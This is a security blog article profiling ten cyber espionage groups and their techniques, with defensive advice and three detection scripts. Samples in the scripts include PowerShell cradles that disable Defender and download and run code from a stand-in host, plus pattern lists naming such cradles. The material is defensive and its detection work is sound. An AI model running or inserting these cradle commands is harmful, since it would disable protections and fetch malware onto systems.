10 Known Cyber Espionage Groups and How to Protect Yourself

The world’s new reality is inescapable: cyber espionage groups are out there, and even if your organization isn’t a direct target, it’s increasingly likely that you may still suffer their impact.

As the recent SolarWinds hack showed, software supply chains have become so intertwined that compromising a single vendor can expose hundreds, if not thousands, of its customers.

But what cyber espionage groups – also known as advanced persistent threats (APT) – are out there right now? What are their common techniques and what have they been doing recently? Below we outline a list of 10 of the top APT groups to be aware of in 2021 – and how to defend against common hacker tactics. 

Read more: “Should German businesses care about the SolarWinds hack?”

1. CozyBear

Hitting headlines recently as the suspected perpetrator of the SolarWinds supply-chain compromise, CozyBear is probably the most prominent cyber espionage group on this list.

This APT is believed to be Russian in origin and run by Russian intelligence: earlier reporting pointed to the FSB, and in April 2021 the US and UK governments formally attributed the SolarWinds compromise to the SVR, Russia’s foreign intelligence service. The group has been active for a long time, with researchers dating its operations back to 2008, and it has been the prime suspect behind numerous major attacks:

  1. The SolarWinds supply-chain compromise.
  2. Spear phishing against coronavirus vaccine researchers in the UK.
  3. The Democratic National Committee (DNC) hack during the 2016 US election.
  4. An attack on the Norwegian government.

Other known names: APT29, YTTRIUM, The Dukes and Office Monkeys.

Typical techniques

Having operated for so long, CozyBear has been associated with a number of malware kits and changes its toolset frequently. Some notable attack vectors:

  • The group has often used wide-net phishing (in contrast to the narrow spear phishing of many of the groups below), sometimes sending thousands of emails to a broad range of targets.
  • Victims are sent to a compromised website serving a ZIP archive that contains CozyBear’s malware; when opened, it shows the user an empty decoy PDF while the malware installs.
  • In an alternative lure, victims were sent a Flash video named “Office Monkeys LOL Video.zip”, which really did play a video but also acted as a dropper for the group’s CozyDuke malware kit.
  • One technique that is less common among the other APTs on this list is the use of social media for command and control (C&C). By sending instructions and data through services such as Twitter, the group’s traffic blends in with ordinary web browsing and is harder to spot.
  • CozyBear can also disguise exfiltration using fake .JPG files: the uploads look like photos being posted to a website, but the files actually carry stolen data masquerading as an image. A file whose extension says “image” but whose contents do not is a cheap thing to check for at the proxy.

Who is at risk?

CozyBear appears to prefer targeting high-value government-related departments in the US, UK, Europe (including Germany and Norway), South Korea and Uzbekistan.

Their goal appears predominantly related to cyber espionage, stealing data from victims.

Find out more: CozyBear on MITRE ATT&CK

2. Gorgon Group

Gorgon Group first came to light when Palo Alto Networks’ Unit 42 threat research team began tracking a Pakistan-linked campaign known as Subaat, which started in 2017 and targeted a US organization with phishing attacks.

Technical analysis of that incident suggested the attackers belonged to a wider organization, dubbed Gorgon Group. Gorgon is notable because it was attributed to the 2019 MasterMana Botnet campaign reported by Prevailion, which targeted corporations around the world on a reported budget of only about US$160 and aimed, among other goals, to steal credentials for cryptocurrency wallets. Gorgon’s latest attack vectors are very similar to those used in the MasterMana days.

Typical techniques

Gorgon Group has been observed using three attack vectors:

  1. Abusing common third-party services (e.g. Discord) together with Office documents (e.g. PowerPoint) to get malicious software onto the victim’s computer. Users click a link in Discord to download what looks like an innocent file, but the file contains a trojanized macro that uses process hollowing to inject a piece of malware known as Azorult into a legitimate process, so that it runs undetected.
    a) Azorult is a well-known credential-harvesting malware that can also upload or download files and take screenshots.
  2. The second vector relies less on third parties. Through a phishing email campaign, users are prompted to open an Excel document. Another malicious macro downloads a file (this time masquerading as a .JPG) from a domain controlled by the APT. The .JPG actually contains ASCII text: a PowerShell script that disables Windows Defender and Windows Update, then downloads the next-stage executable.
  3. The third vector relies more on Gorgon-controlled infrastructure. Phishing emails trick victims into downloading a spoofed file with another malicious macro, which then downloads an ASCII text file pretending to be an image. The PowerShell script in this vector starts a multi-step process that downloads as many as four new files, each preparing the system for the eventual installation of a remote-access trojan, njRat, used for credential harvesting and stealing other confidential information.
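Both CozyBear’s fake .JPG uploads (above) and Gorgon’s PowerShell-as-an-image trick rely on nobody checking whether a file is what its name claims. The following is an added example, not code from the article or from any vendor report, of that check: it compares the file’s leading bytes with the magic bytes its extension implies and looks for printable script text where compressed image data should be. The sample files are constructed for the example.

```python
"""Flag files whose name claims an image but whose bytes do not.

Added example, not code from the original article or from any vendor report.
CozyBear has disguised stolen data as .JPG uploads, and Gorgon Group has served
a PowerShell script as plain ASCII text under an image name. Both fail the same
cheap checks: the file does not start with the magic bytes its extension implies,
and/or the body is printable text carrying script keywords. The sample files
below are constructed for this example.
"""
from __future__ import annotations
import os
import re
import string

# Magic bytes for the image types attackers most often borrow names from.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Tokens that betray a script smuggled inside an "image" (matched case-insensitively).
SCRIPT_MARKERS = re.compile(
    rb"(powershell|invoke-expression|\biex\b|downloadstring|downloadfile|"
    rb"set-mppreference|frombase64string|-encodedcommand|mshta|wscript)",
    re.IGNORECASE,
)
PRINTABLE = set(string.printable.encode())


def looks_like_text(data: bytes, threshold: float = 0.95) -> bool:
    """True when almost every byte is printable ASCII; real image data never is."""
    if not data:
        return False
    return sum(b in PRINTABLE for b in data) / len(data) >= threshold


def inspect(name: str, data: bytes) -> list[str]:
    """Return findings for one file; an empty list means it looks like a real image."""
    ext = os.path.splitext(name.lower())[1]
    findings: list[str] = []
    sigs = MAGIC.get(ext)
    if sigs is None:
        return findings  # not an image extension, out of scope for this check
    if not any(data.startswith(sig) for sig in sigs):
        findings.append(f"{name}: extension {ext} but no {ext} magic bytes")
    if looks_like_text(data):
        findings.append(f"{name}: body is printable text, not image data")
        hit = SCRIPT_MARKERS.search(data)
        if hit:
            findings.append(f"{name}: script marker {hit.group(0).decode(errors='replace')!r}")
    return findings


def scan(files: dict[str, bytes]) -> dict[str, list[str]]:
    """Inspect every (name, bytes) pair, e.g. files recovered from a proxy or upload log."""
    return {name: inspect(name, data) for name, data in files.items()}


# Constructed samples: a real JPEG/PNG header, a Gorgon-style script, a CozyBear-style blob.
NOISE = bytes(range(256)) * 4  # stands in for compressed image data
SAMPLES = {
    "holiday.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + NOISE,
    "diagram.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + NOISE,
    "photo.jpg": (b"powershell -w hidden -c \"Set-MpPreference -DisableRealtimeMonitoring $true;"
                  b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""),
    "IMG_0042.jpg": b"PK\x03\x04" + NOISE,   # a ZIP of stolen files renamed to .jpg
}

if __name__ == "__main__":
    for name, findings in scan(SAMPLES).items():
        print(name, "->", findings or "ok")
```

The printable-text test is what catches Gorgon’s variant, and the magic-byte mismatch is what catches CozyBear’s: a renamed archive is binary, so only the header check fires. Both are cheap enough to run on every upload or download a proxy sees.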

Who is at risk? 

The United States and Germany accounted for 21% and 11% respectively of Gorgon’s victims for the first attack vector, according to Prevailion. The US was also a major target of vector two, along with South Korea and India. Switzerland and Singapore made up the majority of targets for vector three.

Some data also suggests the group had an interest in European affairs as well as the utilities sector in the UAE (Dubai in particular).

Unit 42 has also detected Gorgon Group targeting US, Russian and Spanish organizations operating in Pakistan.

Find out more: Gorgon Group on MITRE ATT&CK

3. Deep Panda

Deep Panda is a Chinese group that CrowdStrike considers one of the most advanced state-backed actors in the region.

The well-known 2015 Anthem breach was attributed to Deep Panda, as was the breach of the US Office of Personnel Management (OPM).

Shortly before this article was written, in March 2021, a Chinese state-backed group that Microsoft dubbed HAFNIUM exploited on-premises Microsoft Exchange servers. Its use of web shells and PowerShell tooling bears some resemblance to Deep Panda’s tradecraft, although this is speculation rather than an established link.

Other known names: KungFu Kittens, Shell Crew, WebMasters.

Typical techniques

Stealth is Deep Panda’s specialty. The group uses a variety of techniques designed to install its backdoors while leaving a minimal footprint on the victim’s network.

  • Like most groups on this list, Deep Panda first reconnoitres a target’s externally reachable systems for an exploitable entry point, then uses spear phishing and social engineering to get in.
  • In one case, at the technology company EMC, Deep Panda set up a fake user profile on an engineering website, uploaded a malicious file and then sent emails as this fake person to trick staff into downloading it.
  • Once inside, the group uses PowerShell scripts to download and execute programs in memory rather than writing them to disk, which leaves file-based antivirus nothing to scan. Such malware includes their MadHatter .NET RAT. The group is also known to plant web shells on compromised servers. The practical counter is visibility into PowerShell itself: process command lines and Script Block logging record the download cradle even when nothing ever touches disk.
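What the in-memory technique looks like in the logs, and how to triage it, as an added example (not code from the article or from any vendor): the same download cradles appear whether they are typed by Deep Panda over a web shell or launched from the macros that Gorgon Group uses above. The script scores process-creation command lines against a handful of indicators, decoding -EncodedCommand first so the real script is inspected. The log lines are constructed, and the weights are an assumption to be tuned for your environment.

```python
"""Score PowerShell command lines for fileless download-and-execute cradles.

Added example (not from the original article or any vendor report): Deep Panda's
habit of pulling tools down with PowerShell and running them in memory, and the
macro-launched PowerShell stages used by Gorgon Group, leave the same traces in
process-creation (Sysmon 1 / Windows 4688) or Script Block (Windows 4104)
logging. The log lines below are constructed; the indicator weights are an
assumption and any real deployment should tune them.
"""
from __future__ import annotations
import base64
import re

# (pattern, weight, label), applied to the command text after -enc decoding
INDICATORS = [
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), 3, "invoke-expression"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), 3, "download cradle"),
    (re.compile(r"\[reflection\.assembly\]::load|\.Invoke\(\)", re.I), 3, "in-memory load"),
    (re.compile(r"-(w|win|window|windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-(ep|exec|executionpolicy)\s+bypass", re.I), 2, "policy bypass"),
    (re.compile(r"-(nop|noprofile)\b", re.I), 1, "no profile"),
    (re.compile(r"set-mppreference|amsiutils|amsiinitfailed", re.I), 3, "defence tampering"),
    (re.compile(r"frombase64string", re.I), 2, "base64 payload"),
]
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
ALERT_THRESHOLD = 5


def decode_encoded_command(cmdline: str) -> str:
    """Expand -EncodedCommand (base64 of UTF-16LE) so the indicators see the real script."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline[: m.start()] + " <decoded> " + decoded


def score(cmdline: str) -> tuple[int, list[str]]:
    """Total indicator weight and the labels that fired for one command line."""
    text = decode_encoded_command(cmdline)
    fired = [(w, label) for pat, w, label in INDICATORS if pat.search(text)]
    return sum(w for w, _ in fired), [label for _, label in fired]


def triage(lines: list[str]) -> list[tuple[int, list[str], str]]:
    """Return (score, indicators, line) for every line at or above the alert threshold."""
    out = []
    for line in lines:
        s, hits = score(line)
        if s >= ALERT_THRESHOLD:
            out.append((s, hits, line))
    return out


def encode_for_powershell(script: str) -> str:
    """Only used to build a realistic -enc sample; this is what the attacker does."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample CommandLine fields: two benign admin tasks, two cradles.
SAMPLE_LOG = [
    "powershell.exe -NoProfile -Command Get-ChildItem C:\\Logs | Measure-Object",
    "powershell.exe -w hidden -nop -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage2.ps1')\"",
    "powershell.exe -enc " + encode_for_powershell(
        "$b=[Convert]::FromBase64String($x);[Reflection.Assembly]::Load($b)"),
    "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for s, hits, line in triage(SAMPLE_LOG):
        print(f"[{s}] {', '.join(hits)} :: {line[:80]}")
```

The decoding step matters more than any single indicator: an encoded command line shows no keywords at all until it is turned back into UTF-16 text. Script Block logging (Event ID 4104) gives you the same decoded view from the host side, which is why it belongs in the endpoint baseline.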

Who is at risk?

Organizations based in the United States appear to be most at risk, particularly in the government, defense, financial and telecommunications sectors.

Find out more: Deep Panda on MITRE ATT&CK

4. Bouncing Golf 

Most of the threat actors in this list have a strong focus on Windows computers – but Bouncing Golf has figured out how to hit people on their mobile devices.

The group was identified by the antivirus company Trend Micro in June 2019, at which point its malware, GolfSpy, was reported to have infected over 660 devices. The group’s origin is unknown at the time of writing, because they have worked hard to cover their tracks, for example by masking the registrant contact details of their C&C domains.

That said, Trend Micro has seen similarities between GolfSpy’s code and that of another known APT group, Domestic Kitten. Domestic Kitten is believed to be Iranian in origin, and uses similar techniques.

Typical techniques

Bouncing Golf tries to sneak its malware onto mobile devices by parading GolfSpy as a legitimate application.

  • The group repackages its malware to pose as communication, news, lifestyle, book and reference Android apps popularly used in the Middle East.
  • Bouncing Golf promotes their app on social media (they don’t host it on Google Play), which directs users to a website where they can download and install the fake software.
  • Once installed, GolfSpy can steal data, including:
  • Device accounts
  • Call logs
  • Files
  • Device location
  • Images and videos
  • SMS messages
  • The app can also be commanded to delete or rename files, download/upload files, take screenshots, install more apps, record audio and video, and update itself.

Who is at risk?

Bouncing Golf activity has been detected primarily in Middle Eastern countries, with a focus on stealing military-related data.

Domestic Kitten, the espionage group that may be related to Bouncing Golf, has been observed targeting Turkish and Kurdish individuals and ISIS supporters in Afghanistan, Iran, Iraq and the UK.

Given the nature of GolfSpy and the information it can steal, anyone in these victims’ contact lists, or otherwise connected to them through their devices, could also be at risk.

5. CopyKittens 

CopyKittens is a slightly less technically advanced APT, using simpler techniques than some of its peers: simpler, but still highly dangerous.

They are believed to be Iranian and to have been operating since 2013, having been first detected by Trend Micro and ClearSky in 2015.

CopyKittens ran a years-long cyber espionage campaign dubbed Operation Wilted Tulip. In one notable example the group compromised an email account at the Ministry of Foreign Affairs of Northern Cyprus and used it as a decoy to try to infect other government organizations around the globe.

Typical techniques

While CopyKittens may not be as sophisticated as some of the other names on this list (for example, they have not been seen using zero-day exploits), they are by no means a threat to ignore.

  • CopyKittens attacks its victims from multiple angles, increasing the chance that at least one succeeds. Spear phishing is common, as are fake social media profiles and credential phishing against webmail and consumer accounts (Microsoft, Google, Amazon and Facebook).
  • The group also uses watering hole attacks, compromising online news outlets and other websites so that victims believe they are on a legitimate site.
  • CopyKittens’ goal with so many attack angles is to establish a ‘beachhead’ in a victim’s account, which can then be used to move elsewhere within the network and, with clever use of decoys, to infect other organizations too.

○      This makes it likely that victims come under attack not directly but via their digital supply chain. Our article on why German businesses should care about the SolarWinds hack covers these supply-chain exposures in more detail.

  • The group uses off-the-shelf tooling as well as some custom tools. It has been observed using Mimikatz, Empire, Metasploit and the trial version of Cobalt Strike.
  • Its RAT, Matryoshka, is believed to be self-developed.

Who is at risk?

CopyKittens has been launching data gathering attacks on countries such as Germany, Israel, Saudi Arabia, Turkey, the US and Jordan. Some other nations have been attacked, too, as well as UN employees.

Mainly, CopyKittens goes after government institutions, academic institutions, defense companies, municipal authorities, subcontractors of defense ministries and large IT companies. One notable target, for example, was the German Bundestag.

Find out more: CopyKittens on MITRE ATT&CK

6. APT33

Security company FireEye believes APT33 began operating in 2013. Because of the group’s targeting interests, snippets of Farsi in its code, and the hours and days its members are seen to operate (Saturday to Wednesday, the Iranian working week, in Iran’s time zone), FireEye assesses that the group is Iranian in origin and backed by the Iranian state.

Other known names: HOLMIUM, Elfin

Typical techniques

Spear phishing is a major tactic of APT33, with attacks masquerading as legitimate job openings at desirable companies.

  • Employees in key organizations are sent malicious HTML applications (.hta files) that automatically download APT33’s backdoor. To the user, the file appears innocent.
  • These phishing emails can also send users to spoofed company recruitment websites, some of which look authentic enough to include the company’s Equal Opportunities hiring statement.
  • FireEye suspects APT33’s dropper, DROPSHOT, may be capable of dropping the wiper malware known as SHAPESHIFT. APT33 has not been directly observed using this destructive malware, but FireEye states that DROPSHOT is used exclusively by APT33 and there are instances where DROPSHOT has been associated with SHAPESHIFT.
  • APT33’s backdoor, TURNEDUP, can upload and download files, take screenshots, gather system information and deliver reverse shells.

Who is at risk?

As far as nations go, APT33 has targeted organizations housed in the US, South Korea and Saudi Arabia.

In terms of sectors, the group seems to prefer aviation companies with both military and commercial ties, as well as the energy sector (petrochemical production in particular). Saudi Arabia is a common focus, with companies targeted elsewhere often having links to Saudi Arabia’s energy or aviation sectors.

APT33 may be working to learn more about Saudi Arabia’s capabilities as a means to enhance Iran’s work in these spaces.

Find out more: APT33 on MITRE ATT&CK

7. Charming Kitten 

Charming Kitten made headlines by launching a major phishing attack over the Christmas 2020 break – precisely when the world’s IT departments were less available to review and respond to potential threats.

The group is suspected to have been operating since 2014, perhaps even 2013, and has links to the Iranian government. Charming Kitten also overlaps strongly with Magic Hound, which we detail below.

Other known names: APT35, Phosphorus, Newscaster, Ajax

Typical techniques

Charming Kitten has most recently been associated with phishing campaigns delivered by SMS and email.

  • Victims are urged to click seemingly legitimate links that take them through a five-stage redirect chain, designed to slip past URL-filtering layers, until they land on a domain entirely controlled by the group.
  • Charming Kitten then uses these spoofed domains to steal credentials. They once even set up a website posing as ClearSky, the security firm that was investigating them at the time.
  • In the past, Charming Kitten has used social media channels such as LinkedIn and WhatsApp to pose as journalists and build trust with potential victims before coaxing them into clicking malicious links. For instance, attackers posed as Iranian journalists working for Deutsche Welle and tried to sign victims up for a ‘webinar’, which was, of course, fake.

○      This is a good example of how cyber espionage groups are evolving to use modern channels to hunt victims. Apps like WhatsApp, Telegram and Facebook Messenger are now potential delivery channels for malware and phishing links and must be treated as part of organizational security just like email or web browsing. The spoofed domains at the end of these chains are also something you can look for: a host name that contains your company’s or a partner’s name but sits on someone else’s registered domain is a strong phishing signal.
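One way to catch the spoofed domains Charming Kitten lands its victims on (and the squatted domains Windshift uses, in section 10 below), as an added example that is not code from the article or from ClearSky: the script checks a candidate host name against a short list of protected domains, folds common homoglyphs, and flags both “brand inside someone else’s domain” and “one or two typos away from the brand”. The protected list, the toy public-suffix table and the candidate names are constructed; clearsky.tech is assumed as ClearSky’s domain for the example.

```python
"""Spot lookalike hosts that impersonate your own or a partner's domain.

Added example, not code from the article. Charming Kitten's redirect chains end
on domains built to resemble a legitimate service (once even ClearSky, the firm
investigating them), and Windshift relies on domain squatting for credential
harvesting. This checks a candidate host name against a list of protected
domains using two tests: the brand name appearing inside a label on someone
else's registrable domain (after folding common homoglyphs), and a small edit
distance from the brand. The protected list, the toy public-suffix table and
the candidates are constructed; 'clearsky.tech' is assumed as ClearSky's domain.
"""
from __future__ import annotations

PROTECTED = ["clearsky.tech", "microsoft.com"]
# Two-label public suffixes the toy registrable-domain splitter must know about.
TWO_LABEL_SUFFIXES = {"co.uk", "com.tr", "co.il"}
# Common visual substitutions, applied before comparing names.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def registrable(host: str) -> str:
    """'login.clearsky.tech.evil.com' -> 'evil.com' (toy public-suffix logic)."""
    labels = host.lower().rstrip(".").split(".")
    n = 3 if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return ".".join(labels[-n:])


def fold_homoglyphs(s: str) -> str:
    for bad, good in HOMOGLYPHS:
        s = s.replace(bad, good)
    return s


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host: str, protected: list[str] = PROTECTED) -> tuple[str, str | None]:
    """Return ('legit' | 'lookalike' | 'unrelated', protected domain matched or None)."""
    host = host.lower().rstrip(".")
    reg = registrable(host)
    for p in protected:
        if host == p or host.endswith("." + p):
            return "legit", p
    for p in protected:
        brand = fold_homoglyphs(p.split(".")[0])
        reg_name = fold_homoglyphs(reg.split(".")[0])
        # 1. brand (or a homoglyph of it) used as or inside a label, but on a foreign domain
        if reg != p and any(brand in fold_homoglyphs(label) for label in host.split(".")):
            return "lookalike", p
        # 2. registrable name is a typo or two away from the brand (skip very short brands)
        if reg != p and len(brand) >= 5 and edit_distance(reg_name, brand) <= 2:
            return "lookalike", p
    return "unrelated", None


# Constructed candidates a proxy log or certificate-transparency feed might surface.
CANDIDATES = [
    "mail.clearsky.tech",              # genuine subdomain
    "clearsky.tech.login-secure.com",  # brand as leading labels of a foreign domain
    "clearsky-support.net",            # brand inside a label
    "clearskyy.co.uk",                 # brand plus a two-label suffix
    "rnicrosoft.com",                  # rn -> m homoglyph
    "micros0ft-online.com",            # digit homoglyph plus extra words
    "microsft.com",                    # one character dropped
    "skyclear.net",                    # shares letters but is not a lookalike
    "example.org",
]


def report(hosts: list[str]) -> dict[str, tuple[str, str | None]]:
    return {h: classify(h) for h in hosts}


if __name__ == "__main__":
    for h, (verdict, ref) in report(CANDIDATES).items():
        print(f"{verdict:10} {h:34} {ref or ''}")
```

Feeding newly issued certificates or your proxy’s first-seen domains through a check like this, with your own company name and your key suppliers on the protected list, turns the spoofed-domain trick into an early warning rather than a post-incident discovery.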

Who is at risk?

Charming Kitten has been seen going after members of think tanks, political research centres, university professors, journalists and environmental activists. Its target countries centre on the Persian Gulf, the US and Europe; collectively, the victims appear to be individuals of interest to Iran.

Find out more: Charming Kitten on MITRE ATT&CK

8. Magic Hound 

Magic Hound attacks date back at least to 2014, and possibly as far as 2011. The group has very close ties to other well-known APTs; in fact, several security reports do not distinguish Magic Hound from Charming Kitten or its other aliases at all.

Unit 42 also performed a link analysis of Magic Hound’s infrastructure and tools and found possible links to the groups Rocket Kitten and Cobalt Gypsy.

Typical techniques

Magic Hound has not so far been observed using software exploits; it relies instead on social engineering tailored to very specific targets.

  • Spear phishing is one way Magic Hound attacks victims, sending malicious attachments and trojanized documents. These documents often appear innocuous, such as government forms or even Christmas greeting e-cards.
  • Some of Magic Hound’s techniques resemble Gorgon Group’s above in their use of Microsoft Word or Excel macros to launch PowerShell scripts that retrieve additional custom espionage tools.
  • Some of the group’s files have been hosted on compromised or spoofed websites. In a few cases the websites were genuine, including government department sites, but were serving malware, suggesting they had already been hacked. In other cases, websites were built simply to look legitimate.
  • In the past, Magic Hound has used IRC bots, Python RATs and Magic Unicorn, an open-source tool that injects Meterpreter shellcode via PowerShell.

Who is at risk?

Whereas Charming Kitten has been observed targeting specific individuals in positions of political or academic influence, Magic Hound has been more direct in attacking government, technology and energy sector organizations either based in or with an interest in Saudi Arabia, including US companies.

Rocket Kitten, which may be linked as well, also uses spear phishing to target individuals and organizations in the Middle East (even targets within Iran). Europe and the US were also of interest to the group, with victims often working in defense, political, research, human rights, media and journalism, academic and scientific (e.g. nuclear) roles.

As for Cobalt Gypsy, activities from this group have appeared to target telecommunications, government, defense, oil and financial services firms in the Middle East and North Africa.

Find out more: Magic Hound on MITRE ATT&CK

9. MuddyWater

MuddyWater is an Iranian threat group that is relatively new compared with some of its cohorts, active since at least 2017 and evolving steadily since. Trend Micro does not consider it as advanced as some other APTs (like CopyKittens, there is no evidence of the group using zero-day exploits or advanced malware kits), but it is agile and uses what it has effectively.

For example, within days of Trend Micro publishing a report on the group in 2018, they changed some of their tactics.

Typical techniques

MuddyWater uses spear phishing and Android malware to compromise its victims, covering its tracks as it goes.

  • Spear phishing is its way in. In a recent case study, MuddyWater compromised genuine email accounts and sent emails from them, so the messages appeared to come from a trustworthy source.
  • These emails are designed to get victims to download a document containing trojanized macros that launch a PowerShell backdoor called POWERSTATS v3.
  • More recently, MuddyWater has been behind four Android malware variants posing as legitimate applications. These apps are the first of a two-stage attack designed to steal phone data such as call logs, SMS, contacts and screenshots. The first stage can also spread to other victims via SMS, sending harmful links to the contacts in the infected phone’s address book.
  • To cover its tracks, the group engages in false-flag tactics. While believed to be Iranian, the group’s members leave strings in their code designed to make it look as though it was written elsewhere, for example in China, Russia or Israel.

Who is at risk?

Common MuddyWater targets have been in the Middle East (e.g. Turkey and Afghanistan) or Asia. More recently, though, the group has begun to target European nations as well as the US.

Most victims were government bodies, the majority in education, foreign affairs, defense, interior, finance, trade and customs. A number of victims were also found in the telecommunications sector, including telcos and web hosting providers.

Find out more: MuddyWater on MITRE ATT&CK

10. Windshift 

Windshift was first revealed by the security company DarkMatter at the 2018 Hack in the Box conference. DarkMatter’s researchers believed the group had been operational since 2016, and it was notable for targeting quite an uncommon set of victims: macOS users. Windshift’s macOS malware would not run on a Windows device.

It is also worth pointing out that Windshift’s MO is very similar to that of another known group called Bahamut, and some of the same infrastructure is shared. In addition to macOS attacks, Bahamut was revealed by BlackBerry to employ at least one zero-day developer exhibiting a skill level “above and beyond other APTs.”

Finally, one last thing of note: Windshift deploys tools developed by an Indian security company called Appin (whose website is now offline). Appin at the time denied any involvement in espionage, and it is believed the tools may have been stolen.

Typical techniques

Windshift uses techniques that will now be familiar to anyone who has read about the other APT groups on this list: spear phishing and social engineering through social media. The key difference is that it is equipped to target Apple users.

  • Windshift uses highly targeted spear-phishing attacks, including links designed to harvest credentials.
  • Fake social media personas are used to engage with people of interest in order to reconnoitre potential victims. Windshift monitors targets over a period of months using benign emails parading as legitimate content to learn what it wants (subjects of interest, click habits and so on). Once this profile has been built, the group begins its harvesting activities: phishing emails, SMS texts and domain squatting.
  • If credential harvesting fails after numerous attempts, the group may escalate to malware, dropping malicious software onto a victim’s device through one of the channels mentioned above.

Who is at risk?

Windshift has been highly selective in its choice of victims, going after specific individuals in government departments and critical infrastructure across the Gulf Cooperation Council region. As mentioned, it is notable that Windshift targets macOS users rather than Windows or Android.

Bahamut is similar in its choice of targets, focusing on individuals over companies. Its targets are concentrated in the political, economic and social spheres of the Middle East as well as South Asia (e.g. some spoofed websites focused on political issues such as the Sikh Referendum 2020 in India).

Find out more: Windshift on MITRE ATT&CK

Quick wins to defend yourself against common APT attack vectors

To properly defend yourself against APT threats – or at least mitigate their risk – we would highly recommend that your enterprise performs a top-to-bottom analysis of the business using a modern security architecture framework.

Learn more about how security architecture can help here. 

To talk to a security professional about your individual organization and how it might be at threat, get in touch with us immediately for a free maturity consultation.

In the meantime, however, we know these things take time. Between now and then, there are a few quick-wins you can accomplish to better improve your security in relation to cyber espionage threats.

1. Multi-factor authentication

Multi-factor authentication (MFA) makes it one step harder for outside actors to get into your systems through compromised credentials (which, as we have seen by this point, is a common route in). It can:

  • Improve your security, especially for those organizations with remote workers.
  • Be implemented relatively easily.
  • Help your enterprise meet regulatory requirements to do with security and access controls.

Tips for implementing multi-factor authentication:

  • Start with administrative accounts and your highest-value users: executives such as the CEO and CFO, and senior managers.
  • Enforce MFA at your identity provider (for example Azure AD or AD FS in front of Active Directory) and on every remote entry point: VPN, webmail and remote desktop.
  • Prefer phone-based authenticator apps or hardware security keys over SMS codes. Receiving an SMS every time you log in is inconvenient for employees, and SMS is also the weakest factor, since codes can be intercepted or phished. Phishing-resistant methods such as FIDO2 keys are the direction of travel, and most organizations want to go passwordless eventually.
  • Run an awareness campaign across all levels of the business on the benefits of MFA, so employees understand their role in protecting the company. See the next point for more on this.

Read more from Microsoft: How to implement Multi-Factor Authentication

2. Risk awareness training

Better security starts with your people. A company’s own staff tends to be one of its biggest weak points, and as the profiles above show, most threat groups look for their entry point by targeting people with phishing links.

Risk awareness training is your way to build a culture of cyber safety in your enterprise, from the most senior to the most junior employee. Everyone who has access to the system must know their role in protecting it. Risk awareness training will:

  • Teach staff their role in security.
  • Teach them how to spot suspicious activity (i.e. phishing emails).
  • Teach them how to report said activity to the security team.
  • Build good habits among staff, like using different passwords for different accounts or knowing not to install unapproved apps and software on company devices.

Tips for implementing risk awareness training:

  • Create training materials with a focus on engagement. These assets can be re-used for every new employee, and could help you train remote employees too.
  • Don’t just focus on ‘protecting the business’ but also on ‘protecting yourself’. Cyber security is as much about employees protecting themselves and their peers as it is about the wider business. Having your smartphone hacked is a personal safety issue, not just a company one.
  • Be open and transparent about the what and why of this training. Address employees’ concerns about MFA and try to put their minds at ease.
  • If you struggle to win enthusiasm for the changes, try incentives to encourage better habits.

3. Modern anti-malware/anti-virus software

While some of the more advanced cyber espionage groups use techniques that evade malware monitoring, it is still vital that your company’s computers run the most up-to-date endpoint protection you can get, since it removes a large share of the risk. Given how many of the groups above run their tooling through PowerShell and Office macros rather than dropping executables, look for a product with behavioural and script-level visibility (AMSI and Script Block Logging coverage, EDR-style telemetry), not just signature scanning.

You will also need a policy to keep devices up to date over time. There is no point investing in anti-virus software now only for it to be out of date in a couple of years.

Good anti-virus software will:

  • Scan for threats and remove them, including relatively new ones; security companies constantly research new threats and update their products to match.
  • Scan emails and web traffic to stop users reaching malicious files online.
  • Help protect you from ransomware attacks. Some anti-ransomware services also include backups of your data to limit loss if an attack gets through; keep such backups offline or otherwise out of reach of a compromised account.

Tips for finding the right anti-malware software:

  • Agree on an enterprise-level anti-malware strategy at the senior management level of your business. What is your risk appetite? How will an anti-virus tool fit into that? Who will install it? Who will update it?
  • Know that you can’t take a blanket approach to this. The task of finding suitable software needs to be divided up into key areas (which have their own unique needs). These are:

○      Network perimeter

○      Mail servers

○      LAN servers

○      Workstations (including home and remote users, contractors and vendors).

  • Ask yourself these questions:

○      What are the top threats you must contend with?

○      Will the software slow down your pre-existing software, or crash it?

○      Is the software easy to use?

○      How frequently is it updated with new threats?

○      Is the vendor able or willing to support your roll-out, and will they provide ongoing support?

4. Privileged account management (PAM)

When everyone can access everything, it takes only one compromised user for an APT to get its hands on your data. Making sure that only some of your IT users are ‘privileged’ means that only the people who need it, and whom you trust, have administrative access to critical systems.

  • What is a privileged user? Privileged users have admin access to important systems. They can make changes, delete things, add new things (e.g. user accounts, new software), run maintenance operations and so on.

Tips for implementing PAM:

  • Assign privileged access only to users who need it for their role and whom you trust, meaning users who hold security qualifications and/or have completed the required security training. Give them a separate admin account for privileged work rather than granting rights to the account they use for email and browsing, so that a phished daily-use account does not hand over the keys.
  • Write a PAM policy that clearly defines who can be a privileged user and what that requires.
